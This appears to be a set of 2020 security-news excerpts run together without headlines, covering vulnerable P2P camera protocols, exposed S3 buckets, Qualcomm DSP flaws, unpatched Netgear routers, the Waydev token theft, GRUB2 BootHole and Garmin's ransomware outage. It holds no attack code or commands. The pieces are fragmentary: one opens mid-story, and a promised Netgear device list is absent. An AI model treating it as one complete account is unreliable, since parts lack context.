This is up from estimates of a couple of million last year. The protocols are CS2 Network P2P, used by more than 50 million devices worldwide, and Shenzhen Yunni iLnkP2P, used by more than 3.6 million. The P2P stands for peer-to-peer. The devices’ use of the protocols cannot be switched off.
The upshot is Internet-of-Things gadgets using vulnerable iLnkP2P implementations can be discovered and accessed by strangers, particularly if the default password has not been changed or is easily guessed. Thus miscreants can abuse the protocol to spy on poorly secured cameras and other equipment dotted all over the world (CVE-2019-11219). iLnkP2P connections can also be intercepted by eavesdroppers to snoop on live video streams, login details, and other data (CVE-2019-11220).
Meanwhile, CS2 Network P2P can fall to the same sort of snooping as iLnkP2P (CVE-2020-9525, CVE-2020-9526). iLnkP2P is, we’re told, functionally identical to CS2 Network P2P though there are some differences.
The bugs were found by Paul Marrapese, who has a whole site, hacked.camera, dedicated to the vulnerabilities. “As of August 2020, over 3.7 million vulnerable devices have been found on the internet,” reads the site, which lists affected devices and advice on what to do if you have any at-risk gear. (Summary: throw it away, or try firewalling it off.)
He went public with the CS2 Network P2P flaws this month after being told in February by the protocol’s developers the weaknesses will be addressed in version 4.0. In 2019, he tried to report the iLnkP2P flaws to developers Shenzhen Yunni, received no response, and went public with those bugs in April that year.
At this year’s DEF CON hacking conference, held online last week, Marrapese gave an in-depth dive into the insecure protocols, which you can watch below.
“When hordes of insecure things get put on the internet, you can bet the end result is not going to be pretty,” Marrapese, a red-team member at an enterprise cloud biz, told his web audience. “A $40 purchase from Amazon is all you need to start hacking into devices.”
The protocols use UDP port 32100, and are outlined here by Fabrizio Bertone, who reverse engineered them in 2017. Essentially, they’re designed to let non-tech-savvy owners access their devices, wherever they are. The equipment contacts central servers to announce they’re powered up, and they stay connected by sending heartbeat messages to the servers. These cloud-hosted servers thus know which IP addresses the gadgets are using, and stay in constant touch with the devices.
When a user wants to connect to their device, and starts an app to log into their gadget, the servers will tell the app how to connect to the camera, or whatever it may be, either via the local network or over the internet. If need be, the device and app will be instructed to use something called UDP hole punching to talk to each other through whatever NATs may be in their way, or via a relay if that doesn’t work. This allows the device to be used remotely by the app without having to, say, change any firewall or NAT settings on their home router. The app and device find a way to talk to each other.
“In the context of IoT, P2P is a feature that lets people to connect to their device anywhere in the world without any special setup,” Marrapese said. “You have to remember, some folks don’t even know how to log into their routers, never mind forward a port.”
In the case of iLnkP2P, it turned out it was easy to calculate the unique IDs of strangers’ devices, and thus use the protocol to find and connect to them. The IDs are set at the factory and can’t be changed. Marrapese was able to enumerate millions of gadgets, and use their IP addresses to approximate their physical location, showing equipment scattered primarily across Asia, the UK and Europe, and North America. Many accept the default password, and thus can be accessed by miscreants scanning the internet for vulnerable P2P-connected cameras and the like. According to Marrapese, thousands of new iLnkP2P-connected devices appear online every month.
Misconfigured AWS S3 storage buckets exposing massive amounts of data to the internet are like an unexploded bomb just waiting to go off, say experts.
The team at Truffle Security said its automated search tools were able to stumble across some 4,000 open Amazon-hosted S3 buckets that included data companies would not want public – things like login credentials, security keys, and API keys.
In fact, the leak hunters say that exposed data was so common, they were able to count an average of around 2.5 passwords and access tokens per file analyzed per repository. In some cases, more than 10 secrets were found in a single file; some files had none at all.
These credentials included SQL Server passwords, Coinbase API keys, MongoDB credentials, and logins for other AWS buckets that actually were configured to ask for a password.
That the Truffle Security team was able to turn up roughly 4,000 insecure buckets with private information shows just how common it is for companies to leave their cloud storage instances unguarded.
Though AWS has done what it can to get customers to lock down their cloud instances, finding exposed storage buckets and databases is pretty trivial for trained security professionals to pull off.
In some cases, the leak-hunters have even partnered up with law firms, collecting referral fees when they send aggrieved customers to take part in class-action lawsuits against companies that exposed their data.
With over 3 billion users globally, smartphones are an integral, almost inseparable part of our day-to-day lives.
As the mobile market continues to grow, vendors race to provide new features, new capabilities and better technological innovations in their latest devices. To support this relentless drive for innovation, vendors often rely on third parties to provide the required hardware and software for phones. One of the most common third-party solutions is the Digital Signal Processor unit, commonly known as DSP chips.
In this research dubbed “Achilles” we performed an extensive security review of a DSP chip from one of the leading manufacturers: Qualcomm Technologies. Qualcomm provides a wide variety of chips that are embedded into devices that make up over 40% of the mobile phone market, including high-end phones from Google, Samsung, LG, Xiaomi, OnePlus and more.
More than 400 vulnerable pieces of code were found within the DSP chip we tested, and these vulnerabilities could have the following impact on users of phones with the affected chip:
Attackers can turn the phone into a perfect spying tool, without any user interaction required – The information that can be exfiltrated from the phone include photos, videos, call-recording, real-time microphone data, GPS and location data, etc.
Attackers may be able to render the mobile phone constantly unresponsive – Making all the information stored on this phone permanently unavailable – including photos, videos, contact details, etc – in other words, a targeted denial-of-service attack.
Malware and other malicious code can completely hide their activities and become un-removable.
We disclosed these findings with Qualcomm, who acknowledged them, notified the relevant device vendors and assigned them with the following CVE’s : CVE-2020-11201, CVE-2020-11202, CVE-2020-11206, CVE-2020-11207, CVE-2020-11208 and CVE-2020-11209.
The Focals glasses, however, come with prescription lenses as an option, meaning they can function as everyday prescription eyewear. The bulky frames, housing a laser, battery, and other kit will no longer do anything that regular spectacles cannot do.
Ben Wood, chief analyst at CCS Insight, said the pulling of features from cloud-powered hardware is not uncommon – and something that has happened to him before.
“If you want to be an early adopter and have some fun new tech that an ambitious start-up has created, there’s always a risk that they won’t be able to make the business plan stack up,” he warned.
“That could either mean the service stops working or you end up finding you have to pay additional charges to maintain service continuity.”
Netgear has quietly decided not to patch more than 40 home routers to plug a remote code execution vulnerability – despite security researchers having published proof-of-concept exploit code.
Keen-eyed Reg readers, however, noticed that Netgear quietly declared 45 of the affected products as “outside the security support period” – meaning those items won’t be updated to protect them against the vuln.
America’s Carnegie-Mellon University summarised the vuln in a note from its Software Engineering Institute: “Multiple Netgear devices contain a stack buffer overflow in the httpd web server’s handling of upgrade_check.cgi, which may allow for unauthenticated remote code execution with root privileges.”
Stung by pressure from infosec researchers that came to a head in June when ZDI went public, Netgear began issuing patches. It had sorted out 28 of the 79 vulnerable product lines by the end of that month.
Infosec biz Grimm pitched in after independently discovering the vuln itself by publishing proof-of-concept exploits for the SOHO (Small Office/Home Office) devices.
With today’s revelation that 45 largely consumer and SME-grade items will never be patched, Netgear faces questions over its commitment to older product lines. Such questions have begun to be addressed in Britain by calls from government agencies for new laws forcing manufacturers to reveal devices’ design lifespans at the point of purchase.
[…]
Today Netgear’s advisory page for the patches shows 45 devices’ fix status as “none; outside security support period”. We have collected those devices’ model numbers in the list below:
Waydev, a San Francisco-based company, runs a platform that can be used to track software engineers’ work output by analyzing Git-based codebases. To do this, Waydev runs a special app listed on the GitHub and GitLab app stores.
When users install the app, Waydev receives an OAuth token that it can use to access its customers’ GitHub or GitLab projects. Waydev stores this token in its database and uses it on a daily basis to generate analytical reports for its customers.
Waydev CEO and co-founder Alex Circei told ZDNet today in a phone call that hackers used a blind SQL injection vulnerability to gain access to its database, from where they stole GitHub and GitLab OAuth tokens.
The hackers then used some of these tokens to pivot to other companies’ codebases and gain access to their source code projects.
An annoying vulnerability in the widely used GRUB2 bootloader can be potentially exploited by malware or a rogue insider already on a machine to thoroughly compromise the operating system or hypervisor while evading detection by users and security tools.
[…]
Designated CVE-2020-10713, the vulnerability allows a miscreant to achieve code execution within the open-source bootloader, and effectively control the device at a level above the firmware and below any system software. Bug hunters at Eclypsium, who found the flaw and dubbed it BootHole, said patching the programming blunder will be a priority and a headache for admins.
To be clear, malware or a rogue user must already have administrator privileges on the device to exploit the flaw, which for the vast majority of victims is a game-over situation anyway. You’ve likely lost all your data and network integrity at that point. What this bootloader bug opens up is the ability for a determined miscreant to burrow deeper, run code at a low level below other defenses, and compromise the foundation of a system to the point where they cannot be easily detected by administrators nor antivirus.
Garmin is reportedly being asked to pay a $10 million ransom to free its systems from a cyberattack that has taken down many of its services for two days.
The navigation company was hit by a ransomware attack on Thursday, leaving customers unable to log fitness sessions in Garmin apps and pilots unable to download flight plans for aircraft navigation systems, among other problems. The company’s communication systems have also been taken offline, leaving it unable to respond to disgruntled customers.
Garmin employees have told BleepingComputer that the company was struck down by the WastedLocker ransomware. Screenshots sent to BleepingComputer show long lists of the company’s files encrypted by the malware, with a ransom note attached to each file.
The ransom note tells the recipient to email one of two email addresses to “get a price for your data”. That price, Garmin’s sources have told BleepingComputer, is $10 million.
Crippled Garmin
The ransomware attack has crippled many of the company’s systems. Reports claim that Garmin’s IT department shut down all of the company’s computers, including those of employees working from home who were connected by VPN, to halt the spread of the ransomware across its network.
Garmin’s Taiwan factories have reportedly closed production lines yesterday and today while the company attempts to unpick the ransomware.
The shutdown is having a big effect on Garmin’s customers. DownDetector reveals a huge spike today in people having trouble accessing Garmin Connect, the app that logs fitness routines for the company’s devices. More people are likely to be using such devices at the weekend.
DownDetector shows how Garmin customers continue to be affected
DownDetector
The problem is even more serious for Garmin’s aviation device customers. Pilots have told ZDNet that they are unable to download a version of Garmin’s aviation database onto their airplane navigation systems, which is an FAA requirement.
Garmin has issued very little public comment about the problem. On Thursday, the company issued a tweet saying “we are currently experiencing an outage that affects Garmin Connect,” adding that the outage “also affects our call centers and we are currently unable to receive any calls, emails or online chats”.
Garmin has been approached for comment, but as you can appreciate from the statement above, that’s somewhat complicated…